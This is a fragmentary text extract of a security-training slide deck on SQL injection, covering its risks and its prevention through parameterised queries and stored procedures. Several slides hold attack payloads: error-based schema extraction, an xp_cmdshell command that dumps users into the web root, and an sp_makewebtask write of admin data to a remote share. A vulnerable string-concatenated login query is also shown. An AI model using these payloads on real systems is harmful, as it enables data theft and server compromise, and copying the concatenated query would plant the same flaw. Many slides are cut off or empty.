to prevent SQL injection attack.. • This presentation is going to tell you Not Only some information about SQL injection but also more important things, How to prevent SQL injection corr
Trang 2• Introduction
• SQL Injection statistics over 6 years
• Risks Posed By SQL Injection
• How to prevent SQL Injection correctly
• Question & Answers
Trang 3to prevent SQL injection attack
• This presentation is going to tell you Not Only some information about SQL injection but also more
important things, How to prevent SQL injection
correctly
Trang 4– Execute multiple SQL Statements
– Call build-in stored procedures
Trang 6sql = "select * from users where username = ‘" + username + "‘
and password = ‘" + password + "‘";
Trang 7SQL Injection statistics
Trang 8SQL Injection statistics
Trang 9SQL Injection statistics
Trang 10SQL Injection statistics
Trang 11SQL Injection statistics
Trang 12SQL Injection statistics
Trang 13Risks Posed by SQL injection.
Trang 14• Get some important information with select statements
– Get Server Version
(SELECT name from sysobject Where
xtype=‘U’)) – Get Columns List
' OR 1=CONVERT(int,(SELECT TOP 1 [name] FROM syscolumns WHERE [ID] =(SELECT [ID] FROM sysobjects WHERE
Trang 17
System Compromise
• Extended Stored Procedures
– ‘ ; EXEC master.dbo.xp_cmdshell ‘Net user >c:\inetpub\wwwroot\users.txt’
– ‘; EXEC sp_makewebtask
'\\10.1.1.2\public\output.html',
'SELECT * FROM ADMIN‘
Trang 18How to prevent SQL Injection
Trang 19"AND password= @Password";
SqlCommand command = new SqlCommand (sql, connection);
command.Parameters.Add("@Username",
SqlDbType.VarChar).Value = UserName.Text;
command.Parameters.Add("@Password",
SqlDbType.VarChar).Value = Password.Text;
Trang 20STORED PROCEDURES
• Less vulnerable to SQL injection attacks
• Added security via EXECUTE permission
SqlCommand command = new SqlCommand ("Users_GetUser",
Trang 21• SQL Injection is one of the most important
problem in web application security
• As shown in page 7, the number of vulnerabilities reported increased more than triples from 2001 Jan-Jun to the same period in 2006, and it is
expected that this figure will continue to increase
in the near future.
• The solutions for SQL injection are not very
complicate but it requires good management to deploy properly
• Don’t under estimate SQL injection and tackle the problem in a more holistic and systematic
approach
Trang 236 Security Context of Dynamic SQL Statements Inside a Stored Procedure,